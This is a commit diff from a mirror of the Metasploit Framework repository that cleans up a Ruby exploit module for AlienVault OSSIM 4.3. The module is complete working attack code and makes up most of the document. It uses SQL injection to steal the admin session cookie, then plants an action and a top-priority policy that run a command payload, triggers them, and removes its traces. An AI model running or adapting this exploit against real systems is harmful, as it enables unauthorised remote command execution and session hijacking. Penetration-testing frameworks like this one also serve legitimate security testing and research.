infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do module clean up

bug/bundler_fix
jvazquez-r7 2014-04-28 11:45:40 -05:00
parent 2e04bc9e4e
commit 245b591247
1 changed files with 92 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

182
modules/exploits/unix/webapp/alienvault_sqli_exec.rb
View File

@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '106252'],
['EDB', '33006']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'SSL' => true 'SSL' => true
}, },
'Platform' => ['unix'], 'Platform' => 'unix',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Targets' => 'Targets' =>
[ [
['Alienvault OSSIM', {}] ['Alienvault OSSIM 4.3', {}]
], ],
'Privileged' => true, 'Privileged' => true,
'DisclosureDate' => "Apr 28 2014", 'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
# Check version
vprint_status("#{peer} - Trying to detect vulnerable OSSIM")
marker = rand_text_alpha(6) marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4)) sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli } 'vars_get' => { 'date_from' => sqli }
}) })
if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
print_status("#{res.body}")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
marker = rand_text_alpha(6) marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4)) sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi") print_status("#{peer} - Trying to grab admin session through SQLi")
@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_get' => { 'date_from' => sqli } 'vars_get' => { 'date_from' => sqli }
}) })
if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
adminsession = $1 admin_session = $1
@cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]") print_status("#{peer} - Created Action [ #{action} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!") fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end end
# Retrieving the Action ID, used to clean up the action after succesful exploitation # Retrieving the Action ID, used to clean up the action after successful exploitation
post_vars = "page=1&rp=2000"
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'data' => post_vars 'vars_post' => {
'page' => '1',
'rp' => '2000'
}
}) })
if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@actionid = $1 @action_id = $1
print_status("#{peer} - Action ID is [ #{@actionid} ]") print_status("#{peer} - Action ID is [ #{@action_id} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end end
@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation # Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'vars_get' => { 'vars_get' => {
'm_opt' => 'configuration', 'm_opt' => 'configuration',
@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policyctx = $1 policy_ctx = $1
policygroup = $2 policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end end
@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => { 'vars_post' => {
'descr' => policy, 'descr' => policy,
'active' => '1', 'active' => '1',
'group' => policygroup, 'group' => policy_group,
'ctx' => policyctx, 'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies 'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new', 'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY 'sources[]' => '00000000000000000000000000000000', # Source is ANY
@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
'end_day_week' => '7', 'end_day_week' => '7',
'end_day_month' => '31', 'end_day_month' => '31',
'end_month' => '12', 'end_month' => '12',
'actions[]' => @actionid, 'actions[]' => @action_id,
'sim' => '1', 'sim' => '1',
'priority' => '1', 'priority' => '1',
'qualify' => '1', 'qualify' => '1',
@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]") print_status("#{peer} - Created Policy [ #{policy} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'vars_get' => { 'vars_get' => {
'ctx' => policyctx, 'ctx' => policy_ctx,
'group' => policygroup 'group' => policy_group
}, },
'vars_post' => { 'vars_post' => {
'page' => '1', 'page' => '1',
'rp' => '2000' 'rp' => '2000'
} }
}) })
if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policyid = $1 @policy_id = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end end
# Reload the policies to make our new policy active # Reload the policies to make our new policy active
policy = rand_text_alpha(8)
print_status("#{peer} - Reloading Policies") print_status("#{peer} - Reloading Policies")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Policies reloaded!") print_status("#{peer} - Policies reloaded!")
else else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dontexist = rand_text_alpha(8+rand(4)) dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url") print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dontexist), 'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie 'cookie' => @cookie
}) })
if res and res.code == 404 if res && res.code == 404
print_status("#{peer} - Payload delivered") print_status("#{peer} - Payload delivered")
else else
fail_with(Failure::Unknown, "#{peer} - Payload failed!") fail_with(Failure::Unknown, "#{peer} - Payload failed!")
@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup def cleanup
# Clean up, retrieve token so that the policy can be removed begin
print_status("#{peer} - Cleaning up") # Clean up, retrieve token so that the policy can be removed
res = send_request_cgi({ print_status("#{peer} - Cleaning up")
'method' => 'POST', res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), 'method' => 'POST',
'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'vars_post' => { 'f_name' => 'delete_policy' } 'cookie' => @cookie,
}) 'vars_post' => { 'f_name' => 'delete_policy' }
})
if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1 token = $1
print_status("#{peer} - Token [ #{token} ] retrieved") print_status("#{peer} - Token [ #{token} ] retrieved")
else else
print_warning("#{peer} - Unable to retrieve token") print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policyid,
'token' => token
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @actionid,
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Action ID [ #{@actionid} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
end end
end end